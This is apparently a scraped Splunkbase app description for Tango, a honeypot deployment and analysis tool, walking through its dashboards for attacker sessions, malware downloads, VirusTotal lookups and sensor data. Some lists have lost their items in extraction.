Tango is a set of scripts and Splunk apps which help organizations and users quickly and easily deploy honeypots and then view the data and analysis of the attacker sessions.
/opt/splunk/etc/apps/tango/bin/
. Requests can be found here: Kenneth Reitz Github. $ cp -r /opt/splunk/etc/apps/hobbes3_dendrogram/appserver/static/ /opt/splunk/etc/apps/tango/appserver/static
var long_label = d.name
var short_label = d.name
There are a few things that should be noted before you install:
Once you enter the app, you'll be first taken to the "Attack Overview" portion of the app, which shows a broad overview of the attacks against your sensors. This includes Attempts vs. Successes, Latest Logins, Attackers logging into multiple locations, etc.
You'll notice at the top of the app, in the navigation pane, there are multiple categories of reports available to you, which include:
Below we will go through each section and describe some of the data available in each section.
This dashboard shows a broad overview of the attacks against your sensors. This includes Attempts vs. Successes, Latest Logins, Attackers logging into multiple locations, etc.
This is one of the most beneficial dashboards available in the app, since it actually shows you what the attacker is doing on your honeypot. At the top of the dashboard, you can see the most recent sessions along with a filter to select a particular sensor. Clicking on a session will populate the panels below, which includes the passwords attempted/accepted, the commands entered, any files downloaded during the session and the raw logs for the session.
Using this dashboard, you can inquire about a certain IP and if seen in the app, you can get valuable information pertaining to that IP to include:
This series of dashboards contains some analytical information, to include the % of sessions with interaction, the various SSH versions seen, some environment details extracted by the session, and a Human vs. Bot Identification dashboard.
In this section, you are able to see various geographical data related to each session and attacker. There are currently three dashboards available:
We also include a map which includes the location of attackers seen.
Currently, this dashboard contains the top usernames and passwords seen being attempted by the attackers, as well as the top username/password combinations.
Starting at the top of this page, you can see the latest files downloaded by attackers, which includes the following:
Below that is the latest "Attempted" file downloads. This contains URL's that were seen in a session that do not have a corresponding SHA256 hash (which indicates a successful download). This can be due to a server error on the hosting website, an incorrect spelling of the file, or if this URL was seen elsewhere in the command, perhaps as an argument or target site of the malware.
Lastly, is a panel which you are able to look up a particular SHA256 hash seen previously downloaded in VirusTotal to retrieve the following information:
Please note that the VirusTotal API is limited to 4 requests per minute. With that being said, you can use this panel to quickly lookup the file hashes seen by in your sessions.
This "lookup" will produce a local "cache" to use in other dashboards, so it's useful to run lookups on any malware you see. This was created do to limitations in the Virustotal API, and will be used as a workaround for the time being.
This dashboard will show the Top 10 Malware Signatures we've seen over time, as well as the most recent legitimate malware. This dashboard is populated from the VirusTotal local "cache" found on the File Analysis page. This dashboard will also show you files that have been downloaded, but, produced no signatures in Virustotal.
This set of reports give you information on possible campaigns associated with your sessions. Currently this includes:
This section will continue to be developed to include other possible campaign attribution by looking at other TTP's associated with each session. This could include commands entered during each session, terminal variables (size, language, SSH keys, etc.). For now, we can see the URL's, Domain's and Filenames that have been seen being used by multiple attackers.
This dashboard currently includes reports on the following:
This dashboard provides a graphical representation of the malware downloaded onto each sensor by each attacker, along with the URL and SHASUM of the malware.
This page contains the necessary commands to run on a system to install a honeypot using scripts from the Tango repository.
In this dashboard, you are able to edit a few fields for your sensors, these fields are:
This dashboard provides geographical information pertaining to each sensor currently deployed. You will find the following information available to you in this dashboard:
This dashboard also provides you with a map populated with the locations of all your sensors deployed.
Lastly, this dashboard contains feeds which you can download and integrate with other network monitoring solutions, which will hopefully be automated in the future.
The feeds currently available are:
Version 2.1
Fixed permissions error and updated dashboards
Version 2.0
Now ships with UF 6.3.0
Uses Cowrie Honeypot instead of Kippo to enable better logging and bug fixes
Version 2.0
Now ships with UF 6.3.0
Uses Cowrie Honeypot instead of Kippo to enable better logging and bug fixes
As a Splunkbase app developer, you will have access to all Splunk development resources and receive a 10GB license to build an app that will help solve use cases for customers all over the world. Splunkbase has 1000+ apps from Splunk, our partners and our community. Find an app for most any data source and user need, or simply create your own with help from our developer portal.